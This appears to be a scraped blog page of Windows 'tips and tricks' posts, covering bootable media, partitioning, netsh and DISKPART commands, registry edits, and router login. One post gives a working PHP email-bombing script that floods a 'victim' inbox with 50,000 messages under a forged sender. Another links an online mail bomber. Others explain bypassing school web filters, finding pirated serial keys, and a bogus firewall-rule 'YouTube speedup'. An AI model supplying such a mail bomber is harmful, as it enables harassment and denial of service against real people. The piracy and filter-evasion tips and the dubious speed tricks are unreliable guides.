Posts

Showing posts with the label Computer Tips and Tricks

How to Create Bootable CD of Windows XP by using Nero

Image
>In this article we would create a window XP bootable disk from copied files. This is very useful when you have copied files of XP. To keep backup we generally copy the entire disk on hard disk. But you could not create a bootable disk from these files. To make a bootable XP disk from copied files we need to add boot files with image on CD. The following items are required: A copy of the original Windows CD/DVD. A copy of the Boot Files ( Download ). A minimum of 1GB available hard disk space for CD's. A minimum of 5GB available hard disk space for DVD's. Extract the zip file This zip file contain all required boot files Create a folder named xpcd on c:\ drive and copy all the files and folder of windows XP cd in it Now start your CD burning software I have used NERO for it Select new options from files menu then choose CD-ROM(BOOT) In right pane do following settings Select boot tab Select Image file from Source of boot image data Click on Browse and choose  boot.ima ...

How to Unblock Any Website by using IP Address which is Blocked By School or Colleges

Image
I am providing you with some buttons (proxy buttons) that will take you to google.com and their you can search for any thing that will be unblocked. If above doesn't work, then try this trick: Press Windows key + R or go to start menu and click on Run . Type cmd and hit Enter to open Command Prompt . Type ping getitmuft.blogspot.com and hit Enter (Replace getitmuft.blogspot.com with the website you want to unblock, e.g. www.facebook.com) . It will display an IP Address in []. Open the website by typing this IP in your browser's address bar. Convert IP Address into Decimal URL: You can unblock a blocked website using IP address. But some website sites have their IP address blocked too. If this is the case, converting the IP address into its decimal values may help us to gain access to the restricted website. For example, instead of using http:// 74.125.236.160/ (IP address of Google), you can use the decimal format of the IP address HTTP://1249766560. Decimal IP Conversion ...

Registry Hack - Get Windows XP Security Updates until 2019 for Free

Image
Microsoft ended its support for Windows XP officially more than a month ago on April 8, 2014. This made a large number of users to switch to the latest version of Windows, but still a wide portion of users are using Microsoft oldest and most widely used operating system, despite not receiving security updates. While some companies and organizations who were not able to migrate their operating system’s running Windows XP to another operating system before the support phase ended, are still receiving updates by paying Microsoft for the security patches and updates. Now a relatively simple method has emerged as a trick for the XP users which makes it possible to receive Windows XP security updates for the next five years i.e. until April 2019. It makes use of updates for Windows Embedded POSReady 2009 based on Windows XP Service Pack 3, because the security updates which are being released for POSReady 2009 are inevitably the same updates Microsoft would have rolled out for its Windows XP...

Is Your Computer Male Or Female ?

Image
Just for fun    1. Open Notepad and paste the following code.   CreateObject("SAPI.SpVoice").Speak"i love you" 2. Save the file as gender.vbs  Note : you can write any name instead of gender but dont change extension 3. Now, open the save file 4. If you hear male voice then your computer is male and if you hear female voice then its female. Funny trick Share and Enjoy

How to create New Partition without Formatting a Hard Disk

Image
If your Hard-disk contain 3 partitions in your PC and you need to create 1 more partition then what will you do? Most of people are doing the following methods to create new partition in Hard-disk. Format the Hard-disk and create a new partition. Let’s see an easier method to create a new partition without formatting a Hard-disk. To do this we don’t need any software and also no need to copy the data to separate drives. By doing the following methods we can create a New Partition from System Drive. Right Click on My Computer Click Manage Now “ Computer Management” window will appear. In that window Click Storage Then select Disk Management. In that window Hard-disk and other Storage Media detail will be shown. Now select a Disk drive to create a New Partition. Right Click on particular Drive then Click Shrink Volume. Now windows will show the free space in particular partition . Type the disk size to create New Partition in Shrink Window. Now click on “Shrink” , within few se...

How To Watch Youtube Video With Fast Buffering

Image
1. Go to start 2. Type in CMD "Run as Administrator" 3. Paste this to the command box: netsh advfirewall firewall add rule name="MITCHRIBARYTUBE" dir=in action=block 4. Hit Enter After you done this go and test it by watching your favorite video on Youtube...

How to Customize 'Send to' Menu

Image
The ‘Send to’ is a option that appear when we right click on a file or a folder in windows, send to be a very time consuming activity which help us to move files or folders from one location to another in just 1 or 2 clicks. By customizing Send to list we can easily add some other destinations which we use frequently. To customize Send to menu, open explorer and type the following in address bar : %APPDATA%\Microsoft\Windows\SendTo You will now able to delete existing shortcuts or add new shortcuts to the list. To add new program to the list, right click on blank area, choose new, shortcut and follow the wizard. Choose the program file or we can also add shortcuts to drive or folders. Complete the wizard and see the result.

How To Make Pendrive Bootable Using CMD

Image
Yes the easiest and best method to make pendrive bootable for windows 7,windows 8 and windows XP so on is by CMD. Follow Following Steps To make Pendrive Bootable: Step 1: 1.Start Command Prompt by typing CMD in the start menu and must run it as administrator. 2.Type DISKPART 3.Type LIST DISK Note down the disk number (###) of your USB drive. 4.Type SELECT DISK # (replace#with the disk number e.g.SELECT DISK 1). 5.Type CLEAN 6.Type CREATE PARTITION PRIMARY 7.Type SELECT PARTITION 1 8.Type ACTIVE 9.Type FORMAT FS=NTFS 10.Type ASSIGN 11.Type EXIT Step 2: Now we will copy the bootsector from the original disk or file saved to ur hard-disk. If you have an image you will need to mount it using a tool like Slysoft Virtual Clone Drive. Now I am assuming that the drive letter for the installer disc is X. You need to open up CMD one again. 1.Type X: 2.Type CD BOOT 3.Type BOOTSECT.EXE/NT60 E: where E is the USB drive letter. Now that the DVD is setup all you need to do is copy the contents of...

How To Boot Into Safe Mode On Windows 8 or 8.1

Image
Old safe mode was enabled by pressing F8 key in windows 7 or Windows XP. But windows 8 and windows 8.1 does not supports it. In windows 8 or + you have to be trick to enable safe mode in Windows 8 or windows 8.1. On your computer hold the Shift button and mash the F8 key , this will sometimes boot you into the new advanced “ recovery mode ”, where you can choose to see advanced repair options. You will need to click on the Troubleshoot option. Now select Advanced Options. Now choose the Windows Startup Settings option, by the looks of things we were never meant to find Safe Mode. Finally hit the Restart button. Like magic, when your PC reboots you will be able to boot into Safe Mode from the familiar looking Advanced Boot Options screen. Start Safe Mode When Windows 8 Start: using this option you can start Safe Mode automatically whenever you will start windows 8 automatically. Press the Win+R key combination and type msconfig in run & hit enter. Switch over to the boot tab , an...

How to Bomb Email Account With PHP Script

Image
1. Paste this code in notepad: <?php $mail = 1; do { mail ("Victim E-Mail", "subject", "message", "From Email Can Be Fake"); } while($mail < 50000); ?> In the above script, replace "Victim E-Mail" with the email of the person you intend to wreak havoc on. Replace "subject" with what you want the subject of your mail to be. With "message" replace this with what you want your email message to be (the actual content or body of the email). With "From Email Can Be Fake" , replace this with a fictitious email of your choosing 2. Now save this file as index.php 3. Now the third step is to host this site on internet. Now a days there are many free web hosting sites my favorite is hostinger/000webhost 4. Now go to the hosted site Url until all the mails are sent. This hack will send 50000 email to the victims mail which Your script will run as long as it takes for your domain to be closed down. The sc...

MS Office Excel Shortcut Keys

Image
Shortcut                  Description F2                            Edit the selected cell. F5                            Goto a specific cell. F7                            Spell check selected text and/or document. F11                          Create chart. Ctrl + A                    Select all. Ctrl + B                    Bold. Ctrl + C                    Copy. Ctrl + F                     Find(same as Shift + F5). Ctrl + G               ...

How to Easily Find SERIAL KEYS from Google

Image
1) Go to google.com 2) Write the name of the software you want key and add 94FBR at the end. eg :- if you want to find key of IDM then write " IDM 94FBR " (without quotes) 3) Search it and you will find many sites with serial keys of that software. Note:   We can't guarantee 100% success with this trick, but it works for some softwares.

Set your Network Card’s IP address using Command Prompt

Image
Most everybody can figure out how to change their IP address using Control Panel, but did you know you can set your network card’s IP address using a simple command from the command prompt? Note:   The following commands require you to have an administrative command prompt open by right-clicking on the icon and choosing Run as Administrator. 1. Changing Your IP Address netsh interface ip set address name=”Local Area Connection” static 192.168.0.1 255.255.255.0 192.168.0.254 You want to statically assign an IP address of 192.168.0.1 You want to set a subnet mask of 255.255.255.0 You want to set a default gateway of 192.168.0.254 2. Set static IP address to getting an address from DHCP netsh interface ip set address name=”Local Area Connection” source=dhcp 3. Changing Your DNS Settings netsh interface ip set dns name=”Local Area Connection” static 192.168.0.250 4. The name of the interface you want to change the primary DNS setting for is Local Area Network The IP address of the DNS ...

Hide Data Behind Images

Image
Steganography is the art and science of hiding messages, Images, Data etc. in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data- security through obscurity. By using this small and neat trick you can hide whatever data you want behind any image of your choice without reducing its quality, In the following tutorial I will show you how you can hide data behind images without using any exotic software. (Good old Winrar or Winzip is required)  Create a folder in your C drive and name it as "hide"(Using Root Directory will make this a bit easier).  Now you can put anything and everything you want to hide in this folder. Text files, images, executables (ANYTHING)  .Also, put the image behind which you want to hide the files in the same directory, say "image.jpg".  After putting everything you want to hide in the "hide" folder, Right click on it, and click "Add to Hide.rar" or "Add to archive...

How to Play Youtube Videos in VLC Media Player

Image
Step 1: Open VLC media player, Press CTRL+N Keys to open up Network URL Dialog box... Step 2: Open Youtube, Navigate to Whatever Video you want to Play in VLC, Copy the Url of that video and Paste it in the Dialogue Box and Click on Play.... Enjoy Your Video...

How To Access Router Without knowing Username and Password

In some cases we want to change settings of our router but suddenly we realized that we don’t know the username and password of router.Well, there is a trick , which can easy made you to login to the router with super user rights. Just follow these steps so as to access your router without knowing username and password. 1. Open C ommand Prompt followed by typing cmd in run box. To open Command Prompt Press window + r  and type cmd 2. In command prompt (cmd) type ipconfig and hit enter. 3. As a result there will be a Default Gateway. Copy that address. 4. Go to your web browser and paste/type that IP of gateway (example:192.168.2O.1) and hit enter. 5. After that It will ask your for username and password. 6. Now you have to go to your modem (physically) and on bottom of the modem their will be Modem Access Code. 7. Move back to your browser and type username:admin or user and then type that modem access code in the password field. 8. Congrats....you are In. If you know about...

How to Disable USB Port

Image
Step 1:   Goto run... Step 2:  Type ' regedit ' without quotes... Step 3:  Click on HKEY_LOCAL_MACHINE... Step 4:  Go to SYSTEM... Step 5:  Click on CurrentControlSet... Step 6:  Click on services... Step 7:  Go to USBSTOR.. . Step 8:  Double click on ' Start ' where value is 3 ... Step 9:  Now change the value data with 4 ... Step10: Now press ok Refresh your desktop your USB port is disabled, to enable the usb port replace the value 4 with 3...

Mail Bomber Free Online

http://home.deds.nl/~rikdekoning/phpmailer.html

Unblock Youtube Without Any Software

It is a simple add-on for browsers and it is 100% free and working. I am also using this add-on This is totally free no need to buy premium. Goto to the given links to add this For Google Chrome For Opera For FireFox Follow the given steps to add this in firefox First download hhtpseverywhere.xpi. Click Here to download this file Save the file on desktop Open Firefox and then open addons Then drag httpseverywhere.xpi in addons  You have done..

How to Speed Up Internet Manually

1. Start > Run and type gpedit.msc and hit the OK button. 2. Then expand Administrative templates >> Network >> QoS packet scheduler. 3. Then click on the limit reservable bandwidth. And it'll opens a new window. 4. In that new window select disable and then click OK. 5. After that restart your computer. Now your internet speed will be little bit more than before.